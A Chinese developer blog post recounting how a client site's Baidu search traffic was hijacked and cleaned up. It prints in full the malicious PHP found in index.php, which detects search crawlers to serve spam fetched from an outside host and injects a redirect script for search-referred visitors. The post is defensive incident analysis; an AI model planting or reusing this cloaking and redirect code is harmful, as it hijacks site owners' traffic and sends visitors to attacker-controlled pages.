论百度快照是如何被黑客篡改的
2023-05-06 06:46:11
今天BOSS突然找我说某个客户的网站在百度搜索出来后,却跳转到别的网站去了,给客户照成了成吨成吨的影响。。。。。。总之,要求要立即弄好。没办法,谁叫我是程序狗呢。。。老板说什么就跟着去执行吧。
首先用浏览器检查一下网站,打开网站看看,画面一切正常哦。接着,检查网页源代码,咦,竟然没有发现什么异常!!接下来上百度搜一下关键词,搜索出来了,看下百度快照吧,尼玛,打开一片空白了。。。点击网站进去。。。天啦撸,果然自动跳转了。。。


先是跳到kj98这里来了,随后又跳转到其他网站。虽然跳转速度很快,但是遇到我这个技术狗,还是捕捉到了。OK,开始工作!只是跳转的问题嘛,小case啦。只需要把源码检索一遍就知道问题再哪里了。
果然不出所料,在index.php页面就发现了这些调皮捣蛋的代码。下面把代码贴出来,给同行或有需要的朋友看下:
<?php
function isCrawler() {
$agent= strtolower($_SERVER[HTTP_USER_AGENT]);
if (!empty($agent)) {
$spiderSite= array(
"TencentTraveler",
"Baiduspider+",
"BaiduGame",
"Googlebot",
"msnbot",
"Sosospider+",
"Sogou web spider",
"ia_archiver",
"Yahoo! Slurp",
"YoudaoBot",
"Yahoo Slurp",
"MSNBot",
"Java (Often spam bot)",
"BaiDuSpider",
"Voila",
"Yandex bot",
"BSpider",
"twiceler",
"Sogou Spider",
"Speedy Spider",
"Google AdSense",
"Heritrix",
"Python-urllib",
"Alexa (IA Archiver)",
"Ask",
"Exabot",
"Custo",
"OutfoxBot/YodaoBot",
"yacy",
"SurveyBot",
"legs",
"lwp-trivial",
"Nutch",
"StackRambler","360",
"The web archive (IA Archiver)",
"Perl tool",
"MJ12bot",
"Netcraft",
"MSIECrawler",
"WGet tools",
"larbin",
"Fish search",
);
foreach($spiderSite as $val) {
$str = strtolower($val);
if (strpos($agent, $str) !== false) {
return true;
}
}
} else {
return false;
}
}
function isfromse() {
$agent= strtolower($_SERVER[HTTP_REFERER]);
if (!empty($agent)) {
$spiderSite= array("google","baidu","sogou","yahoo","soso","360","so","yahoo","bing","youdao");
foreach($spiderSite as $val) {
$str = strtolower($val);
if (strpos($agent, $str) !== false) {
return true;
}
}
} else {
return false;
}
}
/*
function qishu($qishu_url){
return file_get_contents($qishu_url);
}
function ziliao($ziliao_url){
return file_get_contents($ziliao_url);
}
*/
if (isCrawler()){
$qishu_str = file_get_contents(http://www.kj98.top/6qi.txt);//此处输入期数地址
$ziliao_str = file_get_contents(http://www.kj98.top/php1/183.htm);//此处输入资料地址
$ziliao_str = str_replace({期数},$qishu_str,$ziliao_str);
ob_get_clean();
echo $ziliao_str;die();
}
if (isfromse()){
ob_get_clean();
echo <script type="text/javascript" src="http://www.kj98.top/js/333.js"></script>;//搜索引擎来源跳转地址test.js替换成外部js的地址
die();
}
?>
代码大致意思就是判断爬虫类型,获取浏览器类型后,将原来的网站地址分别跳转到黑客指定的地址。就是这几行代码啦,弄得客户流量流失到同行网站那边了。弄清楚原理后,果断把这些代码全部删除了。再到百度搜索那边搜索一下,果然恢复正常了!哦也!程序狗再次打败大坏蛋!屁颠屁颠去BOSS那里领功啦!
PS:最后提醒下,不要忘记更改服务器密码啊,已经给人拜访一次的,说明坏蛋已经盯上你了,下次还会再来的。
以上就是关于《论百度快照是如何被黑客篡改的》的全部内容,本文网址:https://www.7ca.cn/baike/23243.shtml,如对您有帮助可以分享给好友,谢谢。
声明